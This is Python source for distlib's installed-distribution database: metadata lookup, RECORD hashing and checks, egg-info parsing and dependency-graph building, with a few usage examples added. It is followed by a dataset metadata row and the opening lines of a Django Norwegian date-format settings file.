:rtype: :class:`InstalledDistribution`, :class:`EggInfoDistribution`
or ``None``
"""
result = None
name = name.lower()
if not self._cache_enabled:
for dist in self._yield_distributions():
if dist.key == name:
result = dist
break
else:
self._generate_cache()
if name in self._cache.name:
result = self._cache.name[name][0]
elif self._include_egg and name in self._cache_egg.name:
result = self._cache_egg.name[name][0]
return result
def provides_distribution(self, name, version=None):
"""
Iterates over all distributions to find which distributions provide *name*.
If a *version* is provided, it will be used to filter the results.
This function only returns the first result found, since no more than
one value is expected. If the directory is not found, returns ``None``.
:parameter version: a version specifier that indicates the version
required, conforming to the format in ``PEP-345``
:type name: string
:type version: string
"""
matcher = None
if not version is None:
try:
matcher = self._scheme.matcher('%s (%s)' % (name, version))
except ValueError:
raise DistlibException('invalid name or version: %r, %r' %
(name, version))
for dist in self.get_distributions():
provided = dist.provides
for p in provided:
p_components = p.rsplit(' ', 1)
if len(p_components) == 1 or matcher is None:
if name == p_components[0]:
yield dist
break
else:
p_name, p_ver = p_components
if len(p_ver) < 2 or p_ver[0] != '(' or p_ver[-1] != ')':
raise DistlibException(
'distribution %r has invalid Provides field: %r' %
(dist.name, p))
p_ver = p_ver[1:-1] # trim off the parenthesis
if p_name == name and matcher.match(p_ver):
yield dist
break
def get_file_path(self, name, relative_path):
"""
Return the path to a resource file.
"""
dist = self.get_distribution(name)
if dist is None:
raise LookupError('no distribution named %r found' % name)
return dist.get_resource_path(relative_path)
def get_exported_entries(self, category, name=None):
"""
Return all of the exported entries in a particular category.
:param category: The category to search for entries.
:param name: If specified, only entries with that name are returned.
"""
for dist in self.get_distributions():
r = dist.exports
if category in r:
d = r[category]
if name is not None:
if name in d:
yield d[name]
else:
for v in d.values():
yield v
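# A minimal usage sketch of the query API above. It assumes the enclosing class
# is distlib's DistributionPath and that an instance is passed in (e.g. built as
# ``DistributionPath(include_egg=True)``); the names 'requests' and
# 'console_scripts' are purely illustrative.
def _example_query_distributions(dist_path):
    # Enumerate every distribution visible on the path.
    for dist in dist_path.get_distributions():
        print('%s %s' % (dist.name, dist.version))
    # Look up one distribution by (case-insensitive) name.
    dist = dist_path.get_distribution('requests')
    if dist is not None:
        print('found %s' % dist.name_and_version)
    # Find which installed distributions provide a given name/version.
    for provider in dist_path.provides_distribution('requests', '>= 2.0'):
        print('provided by %s' % provider)
    # Enumerate exported entries in one category.
    for entry in dist_path.get_exported_entries('console_scripts'):
        print(entry.name)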
class Distribution(object):
"""
A base class for distributions, whether installed or from indexes.
Either way, it must have some metadata, so that's all that's needed
for construction.
"""
build_time_dependency = False
"""
Set to True if it's known to be only a build-time dependency (i.e.
not needed after installation).
"""
requested = False
"""A boolean that indicates whether the ``REQUESTED`` metadata file is
present (in other words, whether the package was installed by user
request or it was installed as a dependency)."""
def __init__(self, metadata):
"""
Initialise an instance.
:param metadata: The instance of :class:`Metadata` describing this
distribution.
"""
self.metadata = metadata
self.name = metadata.name
self.key = self.name.lower() # for case-insensitive comparisons
self.version = metadata.version
self.locator = None
self.md5_digest = None
self.extras = None # additional features requested during installation
@property
def download_url(self):
"""
The download URL for this distribution.
"""
return self.metadata.download_url
@property
def name_and_version(self):
"""
A utility property which displays the name and version in parentheses.
"""
return '%s (%s)' % (self.name, self.version)
@property
def provides(self):
"""
A set of distribution names and versions provided by this distribution.
:return: A set of "name (version)" strings.
"""
plist = self.metadata['Provides-Dist']
s = '%s (%s)' % (self.name, self.version)
if s not in plist:
plist.append(s)
return self.filter_requirements(plist)
@property
def requires(self):
rlist = self.metadata['Requires-Dist']
return self.filter_requirements(rlist)
@property
def setup_requires(self):
rlist = self.metadata['Setup-Requires-Dist']
return self.filter_requirements(rlist)
@property
def test_requires(self):
rlist = self.metadata['Requires-Dist']
return self.filter_requirements(rlist, extras=['test'])
@property
def doc_requires(self):
rlist = self.metadata['Requires-Dist']
return self.filter_requirements(rlist, extras=['doc'])
def filter_requirements(self, rlist, context=None, extras=None):
result = set()
marked = []
for req in rlist:
if ';' not in req:
result.add(req)
else:
marked.append(req.split(';', 1))
if marked:
if context is None:
context = {}
if extras is None:
extras = self.extras
if not extras:
extras = [None]
else:
extras = list(extras) # leave original alone
extras.append(None)
for extra in extras:
context['extra'] = extra
for r, marker in marked:
if interpret(marker, context):
result.add(r.strip())
return result
def matches_requirement(self, req):
"""
Say if this instance matches (fulfills) a requirement.
:param req: The requirement to match.
:rtype req: str
:return: True if it matches, else False.
"""
scheme = get_scheme(self.metadata.scheme)
try:
matcher = scheme.matcher(req)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
result = False
# Note this is similar to code in make_graph - to be refactored
for p in self.provides:
vm = scheme.matcher(p)
if vm.key != name:
continue
version = vm.exact_version
assert version
try:
result = matcher.match(version)
break
except UnsupportedVersionError:
pass
return result
def __repr__(self):
"""
        Return a textual representation of this instance.
"""
if self.download_url:
suffix = ' [%s]' % self.download_url
else:
suffix = ''
return '<Distribution %s (%s)%s>' % (self.name, self.version, suffix)
def __eq__(self, other):
"""
See if this distribution is the same as another.
:param other: The distribution to compare with. To be equal to one
                      another, distributions must have the same type, name,
version and download_url.
:return: True if it is the same, else False.
"""
if type(other) is not type(self):
result = False
else:
result = (self.name == other.name and
self.version == other.version and
self.download_url == other.download_url)
return result
def __hash__(self):
"""
Compute hash in a way which matches the equality test.
"""
return hash(self.name) + hash(self.version) + hash(self.download_url)
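# Illustrative sketch of the Distribution API above, built with the module-level
# ``make_dist`` helper defined near the end of this module; the names, versions
# and requirement string are made up, and the exact Metadata behaviour depends on
# the metadata version in use.
def _example_distribution_api():
    dist = make_dist('foo', '1.0')
    print(dist.name_and_version)                      # 'foo (1.0)'
    print(sorted(dist.provides))                      # contains 'foo (1.0)'
    print(dist.matches_requirement('foo (>= 0.9)'))   # expected: True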
class BaseInstalledDistribution(Distribution):
"""
This is the base class for installed distributions (whether PEP 376 or
legacy).
"""
hasher = None
def __init__(self, metadata, path, env=None):
"""
Initialise an instance.
:param metadata: An instance of :class:`Metadata` which describes the
distribution. This will normally have been initialised
from a metadata file in the ``path``.
:param path: The path of the ``.dist-info`` or ``.egg-info``
directory for the distribution.
:param env: This is normally the :class:`DistributionPath`
instance where this distribution was found.
"""
super(BaseInstalledDistribution, self).__init__(metadata)
self.path = path
self.dist_path = env
def get_hash(self, data, hasher=None):
"""
Get the hash of some data, using a particular hash algorithm, if
specified.
:param data: The data to be hashed.
:type data: bytes
:param hasher: The name of a hash implementation, supported by hashlib,
or ``None``. Examples of valid values are ``'sha1'``,
                       ``'sha224'``, ``'sha384'``, ``'sha256'``, ``'md5'`` and
``'sha512'``. If no hasher is specified, the ``hasher``
attribute of the :class:`InstalledDistribution` instance
is used. If the hasher is determined to be ``None``, MD5
is used as the hashing algorithm.
:returns: The hash of the data. If a hasher was explicitly specified,
the returned hash will be prefixed with the specified hasher
followed by '='.
:rtype: str
"""
if hasher is None:
hasher = self.hasher
if hasher is None:
hasher = hashlib.md5
prefix = ''
else:
            prefix = '%s=' % hasher
            hasher = getattr(hashlib, hasher)
digest = hasher(data).digest()
digest = base64.urlsafe_b64encode(digest).rstrip(b'=').decode('ascii')
return '%s%s' % (prefix, digest)
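# A small sketch of the digest format produced by ``get_hash`` above: the raw
# digest is urlsafe-base64-encoded with '=' padding stripped and, when a hash
# name is in play, prefixed with '<name>='. The input bytes and hash name below
# are only illustrative.
def _example_record_digest(data=b'example', hasher_name='sha256'):
    digest = getattr(hashlib, hasher_name)(data).digest()
    encoded = base64.urlsafe_b64encode(digest).rstrip(b'=').decode('ascii')
    return '%s=%s' % (hasher_name, encoded)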
class InstalledDistribution(BaseInstalledDistribution):
"""Created with the *path* of the ``.dist-info`` directory provided to the
constructor. It reads the metadata contained in ``METADATA`` when it is
    instantiated, or uses a passed-in Metadata instance (useful for when
dry-run mode is being used)."""
hasher = 'sha256'
def __init__(self, path, metadata=None, env=None):
if env and env._cache_enabled and path in env._cache.path:
metadata = env._cache.path[path].metadata
elif metadata is None:
metadata_path = os.path.join(path, 'METADATA')
metadata = Metadata(path=metadata_path, scheme='legacy')
super(InstalledDistribution, self).__init__(metadata, path, env)
if env and env._cache_enabled:
env._cache.add(self)
path = self.get_distinfo_file('REQUESTED')
self.requested = os.path.exists(path)
def __repr__(self):
return '<InstalledDistribution %r %s at %r>' % (
self.name, self.version, self.path)
def __str__(self):
return "%s %s" % (self.name, self.version)
def _get_records(self):
"""
Get the list of installed files for the distribution
:return: A list of tuples of path, hash and size. Note that hash and
size might be ``None`` for some entries. The path is exactly
as stored in the file (which is as in PEP 376).
"""
results = []
path = self.get_distinfo_file('RECORD')
with CSVReader(path) as record_reader:
# Base location is parent dir of .dist-info dir
#base_location = os.path.dirname(self.path)
#base_location = os.path.abspath(base_location)
for row in record_reader:
missing = [None for i in range(len(row), 3)]
path, checksum, size = row + missing
#if not os.path.isabs(path):
# path = path.replace('/', os.sep)
# path = os.path.join(base_location, path)
results.append((path, checksum, size))
return results
@cached_property
def exports(self):
"""
Return the information exported by this distribution.
:return: A dictionary of exports, mapping an export category to a list
of :class:`ExportEntry` instances describing the individual
export entries.
"""
result = {}
rf = self.get_distinfo_file('EXPORTS')
if os.path.exists(rf):
result = self.read_exports(rf)
return result
def read_exports(self, filename=None):
"""
Read exports data from a file in .ini format.
:param filename: An absolute pathname of the file to read. If not
specified, the EXPORTS file in the .dist-info
directory of the distribution is read.
:return: A dictionary of exports, mapping an export category to a list
of :class:`ExportEntry` instances describing the individual
export entries.
"""
result = {}
rf = filename or self.get_distinfo_file('EXPORTS')
if os.path.exists(rf):
cp = configparser.ConfigParser()
cp.read(rf)
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
entry.dist = self
entries[name] = entry
return result
def write_exports(self, exports, filename=None):
"""
Write a dictionary of exports to a file in .ini format.
:param exports: A dictionary of exports, mapping an export category to
a list of :class:`ExportEntry` instances describing the
individual export entries.
:param filename: The absolute pathname of the file to write to. If not
specified, the EXPORTS file in the .dist-info
directory is written to.
"""
rf = filename or self.get_distinfo_file('EXPORTS')
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
with open(rf, 'w') as f:
cp.write(f)
def get_resource_path(self, relative_path):
"""
NOTE: This API may change in the future.
Return the absolute path to a resource file with the given relative
path.
:param relative_path: The path, relative to .dist-info, of the resource
of interest.
:return: The absolute path where the resource is to be found.
"""
path = self.get_distinfo_file('RESOURCES')
with CSVReader(path) as resources_reader:
for relative, destination in resources_reader:
if relative == relative_path:
return destination
raise KeyError('no resource file with relative path %r '
'is installed' % relative_path)
def list_installed_files(self):
"""
Iterates over the ``RECORD`` entries and returns a tuple
``(path, hash, size)`` for each line.
:returns: iterator of (path, hash, size)
"""
for result in self._get_records():
yield result
def write_installed_files(self, paths, prefix, dry_run=False):
"""
Writes the ``RECORD`` file, using the ``paths`` iterable passed in. Any
existing ``RECORD`` file is silently overwritten.
prefix is used to determine when to write absolute paths.
"""
prefix = os.path.join(prefix, '')
base = os.path.dirname(self.path)
base_under_prefix = base.startswith(prefix)
base = os.path.join(base, '')
record_path = os.path.join(self.path, 'RECORD')
logger.info('creating %s', record_path)
if dry_run:
return
with CSVWriter(record_path) as writer:
for path in paths:
if os.path.isdir(path) or path.endswith(('.pyc', '.pyo')):
# do not put size and hash, as in PEP-376
hash_value = size = ''
else:
size = '%d' % os.path.getsize(path)
with open(path, 'rb') as fp:
hash_value = self.get_hash(fp.read())
if path.startswith(base) or (base_under_prefix and
path.startswith(prefix)):
path = os.path.relpath(path, base)
writer.writerow((path, hash_value, size))
# add the RECORD file itself
if record_path.startswith(base):
record_path = os.path.relpath(record_path, base)
writer.writerow((record_path, '', ''))
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
base = os.path.dirname(self.path)
record_path = os.path.join(self.path, 'RECORD')
for path, hash_value, size in self.list_installed_files():
if not os.path.isabs(path):
path = os.path.join(base, path)
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
elif os.path.isfile(path):
actual_size = str(os.path.getsize(path))
if size and actual_size != size:
mismatches.append((path, 'size', size, actual_size))
elif hash_value:
if '=' in hash_value:
hasher = hash_value.split('=', 1)[0]
else:
hasher = None
with open(path, 'rb') as f:
actual_hash = self.get_hash(f.read(), hasher)
if actual_hash != hash_value:
mismatches.append((path, 'hash', hash_value, actual_hash))
return mismatches
@cached_property
def shared_locations(self):
"""
A dictionary of shared locations whose keys are in the set 'prefix',
'purelib', 'platlib', 'scripts', 'headers', 'data' and 'namespace'.
The corresponding value is the absolute path of that category for
this distribution, and takes into account any paths selected by the
user at installation time (e.g. via command-line arguments). In the
case of the 'namespace' key, this would be a list of absolute paths
for the roots of namespace packages in this distribution.
The first time this property is accessed, the relevant information is
read from the SHARED file in the .dist-info directory.
"""
result = {}
shared_path = os.path.join(self.path, 'SHARED')
if os.path.isfile(shared_path):
with codecs.open(shared_path, 'r', encoding='utf-8') as f:
lines = f.read().splitlines()
for line in lines:
key, value = line.split('=', 1)
if key == 'namespace':
result.setdefault(key, []).append(value)
else:
result[key] = value
return result
def write_shared_locations(self, paths, dry_run=False):
"""
Write shared location information to the SHARED file in .dist-info.
:param paths: A dictionary as described in the documentation for
:meth:`shared_locations`.
:param dry_run: If True, the action is logged but no file is actually
written.
:return: The path of the file written to.
"""
shared_path = os.path.join(self.path, 'SHARED')
logger.info('creating %s', shared_path)
if dry_run:
return
lines = []
for key in ('prefix', 'lib', 'headers', 'scripts', 'data'):
path = paths[key]
if os.path.isdir(paths[key]):
lines.append('%s=%s' % (key, path))
for ns in paths.get('namespace', ()):
lines.append('namespace=%s' % ns)
with codecs.open(shared_path, 'w', encoding='utf-8') as f:
f.write('\n'.join(lines))
return shared_path
def get_distinfo_file(self, path):
"""
Returns a path located under the ``.dist-info`` directory. Returns a
string representing the path.
:parameter path: a ``'/'``-separated path relative to the
``.dist-info`` directory or an absolute path;
If *path* is an absolute path and doesn't start
with the ``.dist-info`` directory path,
a :class:`DistlibException` is raised
:type path: string
:rtype: str
"""
# Check if it is an absolute path # XXX use relpath, add tests
if path.find(os.sep) >= 0:
# it's an absolute path?
distinfo_dirname, path = path.split(os.sep)[-2:]
if distinfo_dirname != self.path.split(os.sep)[-1]:
raise DistlibException(
'dist-info file %r does not belong to the %r %s '
'distribution' % (path, self.name, self.version))
# The file must be relative
if path not in DIST_FILES:
raise DistlibException('invalid path for a dist-info file: %r' %
path)
return os.path.join(self.path, path)
def list_distinfo_files(self):
"""
Iterates over the ``RECORD`` entries and returns paths for each line if
the path is pointing to a file located in the ``.dist-info`` directory
or one of its subdirectories.
:returns: iterator of paths
"""
base = os.path.dirname(self.path)
for path, checksum, size in self._get_records():
# XXX add separator or use real relpath algo
if not os.path.isabs(path):
path = os.path.join(base, path)
if path.startswith(self.path):
yield path
def __eq__(self, other):
return (isinstance(other, InstalledDistribution) and
self.path == other.path)
# See http://docs.python.org/reference/datamodel#object.__hash__
__hash__ = object.__hash__
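# Usage sketch for InstalledDistribution: point it at an existing ``.dist-info``
# directory and inspect the recorded files and exports. The directory path below
# is hypothetical.
def _example_inspect_dist_info(dist_info_dir='/path/to/site-packages/foo-1.0.dist-info'):
    dist = InstalledDistribution(dist_info_dir)
    for path, hash_value, size in dist.list_installed_files():
        print('%s %s %s' % (path, hash_value, size))
    mismatches = dist.check_installed_files()
    if mismatches:
        print('changed since installation: %r' % (mismatches,))
    for category, entries in dist.exports.items():
        print('%s: %s' % (category, ', '.join(sorted(entries))))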
class EggInfoDistribution(BaseInstalledDistribution):
"""Created with the *path* of the ``.egg-info`` directory or file provided
to the constructor. It reads the metadata contained in the file itself, or
if the given path happens to be a directory, the metadata is read from the
file ``PKG-INFO`` under that directory."""
requested = True # as we have no way of knowing, assume it was
shared_locations = {}
def __init__(self, path, env=None):
def set_name_and_version(s, n, v):
s.name = n
s.key = n.lower() # for case-insensitive comparisons
s.version = v
self.path = path
self.dist_path = env
if env and env._cache_enabled and path in env._cache_egg.path:
metadata = env._cache_egg.path[path].metadata
set_name_and_version(self, metadata['Name'], metadata['Version'])
else:
metadata = self._get_metadata(path)
# Need to be set before caching
set_name_and_version(self, metadata['Name'], metadata['Version'])
if env and env._cache_enabled:
env._cache_egg.add(self)
super(EggInfoDistribution, self).__init__(metadata, path, env)
def _get_metadata(self, path):
requires = None
def parse_requires(req_path):
"""Create a list of dependencies from a requires.txt file.
*req_path* must be the path to a setuptools-produced requires.txt file.
"""
reqs = []
try:
with open(req_path, 'r') as fp:
lines = fp.read().splitlines()
except IOError:
return reqs
for line in lines:
line = line.strip()
if line.startswith('['):
logger.warning('Unexpected line: quitting requirement scan: %r',
line)
break
r = parse_requirement(line)
if not r:
logger.warning('Not recognised as a requirement: %r', line)
continue
if r.extras:
logger.warning('extra requirements in requires.txt are '
'not supported')
if not r.constraints:
reqs.append(r.name)
else:
cons = ', '.join('%s%s' % c for c in r.constraints)
reqs.append('%s (%s)' % (r.name, cons))
return reqs
if path.endswith('.egg'):
if os.path.isdir(path):
meta_path = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
metadata = Metadata(path=meta_path, scheme='legacy')
req_path = os.path.join(path, 'EGG-INFO', 'requires.txt')
requires = parse_requires(req_path)
else:
# FIXME handle the case where zipfile is not available
zipf = zipimport.zipimporter(path)
fileobj = StringIO(
zipf.get_data('EGG-INFO/PKG-INFO').decode('utf8'))
metadata = Metadata(fileobj=fileobj, scheme='legacy')
try:
requires = zipf.get_data('EGG-INFO/requires.txt')
except IOError:
requires = None
elif path.endswith('.egg-info'):
if os.path.isdir(path):
path = os.path.join(path, 'PKG-INFO')
req_path = os.path.join(path, 'requires.txt')
requires = parse_requires(req_path)
metadata = Metadata(path=path, scheme='legacy')
else:
raise DistlibException('path must end with .egg-info or .egg, '
'got %r' % path)
if requires:
if metadata['Metadata-Version'] == '1.1':
# we can't have 1.1 metadata *and* Setuptools requires
for field in ('Obsoletes', 'Requires', 'Provides'):
if field in metadata:
del metadata[field]
metadata['Requires-Dist'] += requires
return metadata
def __repr__(self):
return '<EggInfoDistribution %r %s at %r>' % (
self.name, self.version, self.path)
def __str__(self):
return "%s %s" % (self.name, self.version)
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
record_path = os.path.join(self.path, 'installed-files.txt')
if os.path.exists(record_path):
for path, hash, size in self.list_installed_files():
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
return mismatches
def list_installed_files(self, local=False):
"""
Iterates over the ``installed-files.txt`` entries and returns a tuple
``(path, hash, size)`` for each line.
:returns: a list of (path, hash, size)
"""
def _md5(path):
f = open(path, 'rb')
try:
content = f.read()
finally:
f.close()
return hashlib.md5(content).hexdigest()
def _size(path):
return os.stat(path).st_size
record_path = os.path.join(self.path, 'installed-files.txt')
result = []
if os.path.exists(record_path):
with codecs.open(record_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
p = os.path.normpath(os.path.join(self.path, line))
# "./" is present as a marker between installed files
# and installation metadata files
                    if not os.path.exists(p):
                        logger.warning('Non-existent file: %s', p)
                        if p.endswith(('.pyc', '.pyo')):
                            continue
                        #otherwise fall through and fail
if not os.path.isdir(p):
result.append((p, _md5(p), _size(p)))
result.append((record_path, None, None))
return result
def list_distinfo_files(self, local=False):
"""
Iterates over the ``installed-files.txt`` entries and returns paths for
each line if the path is pointing to a file located in the
``.egg-info`` directory or one of its subdirectories.
:parameter local: If *local* is ``True``, each returned path is
transformed into a local absolute path. Otherwise the
raw value from ``installed-files.txt`` is returned.
:type local: boolean
:returns: iterator of paths
"""
record_path = os.path.join(self.path, 'installed-files.txt')
skip = True
with codecs.open(record_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line == './':
skip = False
continue
if not skip:
p = os.path.normpath(os.path.join(self.path, line))
if p.startswith(self.path):
if local:
yield p
else:
yield line
def __eq__(self, other):
return (isinstance(other, EggInfoDistribution) and
self.path == other.path)
# See http://docs.python.org/reference/datamodel#object.__hash__
__hash__ = object.__hash__
new_dist_class = InstalledDistribution
old_dist_class = EggInfoDistribution
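# Usage sketch for the legacy egg support: ``old_dist_class`` (EggInfoDistribution,
# aliased just above) accepts a ``.egg-info`` directory/file or an ``.egg``; the
# path below is hypothetical.
def _example_inspect_egg_info(egg_info_path='/path/to/site-packages/foo-1.0.egg-info'):
    dist = old_dist_class(egg_info_path)
    print('%s %s' % (dist.name, dist.version))
    for path, file_hash, size in dist.list_installed_files():
        print('%s %s %s' % (path, file_hash, size))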
class DependencyGraph(object):
"""
Represents a dependency graph between distributions.
The dependency relationships are stored in an ``adjacency_list`` that maps
distributions to a list of ``(other, label)`` tuples where ``other``
is a distribution and the edge is labeled with ``label`` (i.e. the version
specifier, if such was provided). Also, for more efficient traversal, for
every distribution ``x``, a list of predecessors is kept in
``reverse_list[x]``. An edge from distribution ``a`` to
distribution ``b`` means that ``a`` depends on ``b``. If any missing
dependencies are found, they are stored in ``missing``, which is a
dictionary that maps distributions to a list of requirements that were not
provided by any other distributions.
"""
def __init__(self):
self.adjacency_list = {}
self.reverse_list = {}
self.missing = {}
def add_distribution(self, distribution):
"""Add the *distribution* to the graph.
:type distribution: :class:`distutils2.database.InstalledDistribution`
or :class:`distutils2.database.EggInfoDistribution`
"""
self.adjacency_list[distribution] = []
self.reverse_list[distribution] = []
#self.missing[distribution] = []
def add_edge(self, x, y, label=None):
"""Add an edge from distribution *x* to distribution *y* with the given
*label*.
:type x: :class:`distutils2.database.InstalledDistribution` or
:class:`distutils2.database.EggInfoDistribution`
:type y: :class:`distutils2.database.InstalledDistribution` or
:class:`distutils2.database.EggInfoDistribution`
:type label: ``str`` or ``None``
"""
self.adjacency_list[x].append((y, label))
# multiple edges are allowed, so be careful
if x not in self.reverse_list[y]:
self.reverse_list[y].append(x)
def add_missing(self, distribution, requirement):
"""
Add a missing *requirement* for the given *distribution*.
:type distribution: :class:`distutils2.database.InstalledDistribution`
or :class:`distutils2.database.EggInfoDistribution`
:type requirement: ``str``
"""
logger.debug('%s missing %r', distribution, requirement)
self.missing.setdefault(distribution, []).append(requirement)
def _repr_dist(self, dist):
return '%s %s' % (dist.name, dist.version)
def repr_node(self, dist, level=1):
"""Prints only a subgraph"""
output = [self._repr_dist(dist)]
for other, label in self.adjacency_list[dist]:
dist = self._repr_dist(other)
if label is not None:
dist = '%s [%s]' % (dist, label)
output.append(' ' * level + str(dist))
suboutput = self.repr_node(other, level + 1)
subs = suboutput.split('\n')
output.extend(subs[1:])
return '\n'.join(output)
def to_dot(self, f, skip_disconnected=True):
"""Writes a DOT output for the graph to the provided file *f*.
If *skip_disconnected* is set to ``True``, then all distributions
that are not dependent on any other distribution are skipped.
:type f: has to support ``file``-like operations
:type skip_disconnected: ``bool``
"""
disconnected = []
f.write("digraph dependencies {\n")
for dist, adjs in self.adjacency_list.items():
if len(adjs) == 0 and not skip_disconnected:
disconnected.append(dist)
for other, label in adjs:
                if label is not None:
f.write('"%s" -> "%s" [label="%s"]\n' %
(dist.name, other.name, label))
else:
f.write('"%s" -> "%s"\n' % (dist.name, other.name))
if not skip_disconnected and len(disconnected) > 0:
f.write('subgraph disconnected {\n')
f.write('label = "Disconnected"\n')
f.write('bgcolor = red\n')
for dist in disconnected:
f.write('"%s"' % dist.name)
f.write('\n')
f.write('}\n')
f.write('}\n')
def topological_sort(self):
"""
Perform a topological sort of the graph.
:return: A tuple, the first element of which is a topologically sorted
list of distributions, and the second element of which is a
list of distributions that cannot be sorted because they have
circular dependencies and so form a cycle.
"""
result = []
# Make a shallow copy of the adjacency list
alist = {}
for k, v in self.adjacency_list.items():
alist[k] = v[:]
while True:
# See what we can remove in this run
to_remove = []
for k, v in list(alist.items())[:]:
if not v:
to_remove.append(k)
del alist[k]
if not to_remove:
# What's left in alist (if anything) is a cycle.
break
# Remove from the adjacency list of others
for k, v in alist.items():
alist[k] = [(d, r) for d, r in v if d not in to_remove]
logger.debug('Moving to result: %s',
['%s (%s)' % (d.name, d.version) for d in to_remove])
result.extend(to_remove)
return result, list(alist.keys())
def __repr__(self):
"""Representation of the graph"""
output = []
for dist, adjs in self.adjacency_list.items():
output.append(self.repr_node(dist))
return '\n'.join(output)
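# A short sketch of driving DependencyGraph directly, following the class
# docstring above; the two distributions are created with ``make_dist`` (defined
# further down) and the edge label/requirement strings are made up.
def _example_dependency_graph():
    app = make_dist('app', '1.0')
    lib = make_dist('lib', '2.0')
    graph = DependencyGraph()
    graph.add_distribution(app)
    graph.add_distribution(lib)
    graph.add_edge(app, lib, 'lib (>= 2.0)')      # app depends on lib
    graph.add_missing(app, 'plugin (>= 1.0)')     # unsatisfied requirement
    ordered, cyclic = graph.topological_sort()
    print([d.name for d in ordered])              # dependencies first: lib, then app
    print(graph.repr_node(app))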
def make_graph(dists, scheme='default'):
"""Makes a dependency graph from the given distributions.
:parameter dists: a list of distributions
:type dists: list of :class:`distutils2.database.InstalledDistribution` and
:class:`distutils2.database.EggInfoDistribution` instances
:rtype: a :class:`DependencyGraph` instance
"""
scheme = get_scheme(scheme)
graph = DependencyGraph()
provided = {} # maps names to lists of (version, dist) tuples
# first, build the graph and find out what's provided
for dist in dists:
graph.add_distribution(dist)
for p in dist.provides:
comps = p.strip().rsplit(" ", 1)
name = comps[0]
version = None
if len(comps) == 2:
version = comps[1]
if len(version) < 3 or version[0] != '(' or version[-1] != ')':
logger.warning('distribution %r has ill-formed '
'provides field: %r', dist.name, p)
continue
# don't raise an exception. Legacy installed distributions
# could have all manner of metadata
#raise DistlibException('distribution %r has ill-formed '
# 'provides field: %r' % (dist.name, p))
version = version[1:-1] # trim off parenthesis
# Add name in lower case for case-insensitivity
name = name.lower()
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
provided.setdefault(name, []).append((version, dist))
# now make the edges
for dist in dists:
requires = (dist.requires | dist.setup_requires)
for req in requires:
try:
matcher = scheme.matcher(req)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
matched = False
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
graph.add_edge(dist, provider, req)
matched = True
break
if not matched:
graph.add_missing(dist, req)
return graph
def get_dependent_dists(dists, dist):
"""Recursively generate a list of distributions from *dists* that are
dependent on *dist*.
:param dists: a list of distributions
    :param dist: a distribution, member of *dists*, whose dependent distributions
                 are to be found
"""
if dist not in dists:
raise DistlibException('given distribution %r is not a member '
'of the list' % dist.name)
graph = make_graph(dists)
dep = [dist] # dependent distributions
todo = graph.reverse_list[dist] # list of nodes we should inspect
while todo:
d = todo.pop()
dep.append(d)
for succ in graph.reverse_list[d]:
if succ not in dep:
todo.append(succ)
dep.pop(0) # remove dist from dep, was there to prevent infinite loops
return dep
def get_required_dists(dists, dist):
"""Recursively generate a list of distributions from *dists* that are
required by *dist*.
:param dists: a list of distributions
    :param dist: a distribution, member of *dists*, whose required distributions
                 are to be found
"""
if dist not in dists:
raise DistlibException('given distribution %r is not a member '
'of the list' % dist.name)
graph = make_graph(dists)
req = [] # required distributions
todo = graph.adjacency_list[dist] # list of nodes we should inspect
while todo:
d = todo.pop()[0]
req.append(d)
for pred in graph.adjacency_list[d]:
if pred not in req:
todo.append(pred)
return req
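# Sketch tying the graph helpers together: build the graph for an installed set
# of distributions and query it. ``dist_path`` is assumed to behave like the
# DistributionPath class earlier in this module; the name 'foo' is illustrative.
def _example_graph_queries(dist_path, name='foo'):
    dists = list(dist_path.get_distributions())
    graph = make_graph(dists)
    for dist, missing in graph.missing.items():
        print('%s is missing %s' % (dist, ', '.join(missing)))
    target = dist_path.get_distribution(name)
    if target is not None and target in dists:
        print('requires: %r' % ([d.name for d in get_required_dists(dists, target)],))
        print('needed by: %r' % ([d.name for d in get_dependent_dists(dists, target)],))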
def make_dist(name, version, **kwargs):
"""
A convenience method for making a dist given just a name and version.
"""
md = Metadata(**kwargs)
md['Name'] = name
md['Version'] = version
return Distribution(md)
| apache-2.0 | 6,840,298,047,811,313,000 | 37.129131 | 86 | 0.545015 | false |
golismero/golismero-devel | thirdparty_libs/django/conf/locale/nb/formats.py | 107 | 1585 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'd.m.Y'
SHORT_DATETIME_FORMAT = 'd.m.Y H:i'
FIRST_DAY_OF_WEEK = 1 # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
